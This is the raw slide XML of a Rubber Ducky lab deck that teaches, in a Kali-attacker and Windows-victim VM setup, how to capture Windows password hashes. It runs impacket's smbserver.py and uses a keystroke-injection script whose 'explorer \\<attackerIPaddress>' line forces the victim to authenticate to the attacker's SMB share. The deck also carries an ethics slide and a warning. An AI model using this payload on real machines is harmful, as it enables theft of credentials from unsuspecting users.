              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Act honorably, honestly, justly, responsibly, and legally. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-Provide diligent and competent service to principals. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-Advance and protect the profession. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391051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Password Hashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In this lab we will learn how to use rubber ducky to automate some basic CLI (command line interface) commands. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We will create Kali VM &amp; Windows VM to grab password hashes by using samba server (Samba allows file and print sharing between computers running Microsoft Windows and Unix).  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We will use notepad as our word processor, but you can use any other.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We need to first create a script for this ‘Send an Email via Gmail lab’ using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://ducktoolkit.com/encoder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and type in the script where it says “STRING Enter Ducky Script Here”.</a:t>
            </a:r>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518741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Password Hashes</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The Rubber Ducky is a keyboard emulator that will automatically run pre-generated scripts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This can come in handy when using Windows CLI (command line interface) OR PowerShell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In this lab we will show you a ducky script that will grab the password hashes (Hash function is any function that can be used to map data of arbitrary size to data of fixed size and value returned by hash function are hashes. When we enter password, password gets converted into hashes by various hash functions.) with the help of Kali Linux as attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In order to have full understanding, you should understand the concepts of using the command prompt in Windows. (See “Command line intro” lab in the “1. Intro Labs” folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On the next slide we will explain the sample code line-by-line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370765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25"/>
            <a:ext cx="10515600" cy="870551"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="930876"/>
            <a:ext cx="10515600" cy="5927124"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What you’ll need for this lab- </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VMware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ; Kali as Attacker ; Windows as Victim ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Impackets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> smbserver.py ; Ducky Script ; Rubber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ducky</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WARNING! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use VMware ONLY for security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>purposes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Once you are ready with the Kali &amp; the Windows VMware, download samba server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and extract packet into ‘root’ folder in your Kali machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>smbserver.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/CoreSecurity/impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  (you can download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1411669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801"/>
            <a:ext cx="10515600" cy="755222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Lab Cont.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="453081" y="832022"/>
            <a:ext cx="11269362" cy="6025977"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now as you are ready with your VM machines and samba server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>we will move forward to break the password hash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘Terminal’ in your Kali machine and type the following commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>~#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>change directory to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> ls				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>shows the list of the files in that directory&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>python setup.py install	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>to get current version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>smbserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, needs to install setup&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>cd examples		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>change directory to examples&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/examples# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>./smbserver.py 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>runs samba server&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/examples# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>./smbserver.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>address directory/path to save hashes&gt;</a:t>
            </a:r>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3704759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25"/>
            <a:ext cx="10515600" cy="656367"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Lab Cont.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1318054"/>
            <a:ext cx="10515600" cy="4753232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Once samba server starts running, open any ducky editor and type the following program code written in bold letters:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>DELAY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0"/>
              <a:t>1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>GUI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0"/>
              <a:t>r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>DELAY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0"/>
              <a:t>100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>STRING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0"/>
              <a:t> /C @start /MIN explorer \\&lt;attackerIPaddress / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0" err="1"/>
              <a:t>KalimachinesIPaddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0"/>
              <a:t>&gt;@</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>ENTER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1820562" y="3369276"/>
            <a:ext cx="164757" cy="263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88542" y="3123055"/>
            <a:ext cx="1445740" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Close command prompt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1540476" y="3789405"/>
            <a:ext cx="0" cy="238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38200" y="4025643"/>
            <a:ext cx="1445740" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>pen command prompt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1985319" y="3787346"/>
            <a:ext cx="11718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619632" y="3787346"/>
            <a:ext cx="189471" cy="238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434282" y="4025643"/>
            <a:ext cx="1445740" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Open file explorer in minimized state</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3245708" y="3632886"/>
            <a:ext cx="28502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4654378" y="3369276"/>
            <a:ext cx="197708" cy="263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120978" y="2969165"/>
            <a:ext cx="1670222" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Connects to samba server to pass grabbed hashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Connector 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771135" y="3632886"/>
            <a:ext cx="823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433384" y="3787346"/>
            <a:ext cx="20594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699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1046</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Rubber Ducky Advance Labs</vt:lpstr>
      <vt:lpstr>Required Materials</vt:lpstr>
      <vt:lpstr>What is Rubber Ducky?</vt:lpstr>
      <vt:lpstr>Ethics – Doing the Right Thing</vt:lpstr>
      <vt:lpstr>Password Hashes</vt:lpstr>
      <vt:lpstr>Password Hashes</vt:lpstr>
      <vt:lpstr>Lab</vt:lpstr>
      <vt:lpstr>Lab Cont.</vt:lpstr>
      <vt:lpstr>Lab Cont.</vt:lpstr>
      <vt:lpstr>Implementation</vt:lpstr>
      <vt:lpstr>Implementation Continued</vt:lpstr>
      <vt:lpstr>Improve the code on your own</vt:lpstr>
      <vt:lpstr>What’s next?</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Pace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Kulkarni, Mr. Gaurav Vijay</dc:creator>
  <cp:lastModifiedBy>geeky cool</cp:lastModifiedBy>
  <cp:revision>42</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-22T23:30:19Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-07T01:57:32Z</dcterms:modified>
</cp:coreProperties>
</file>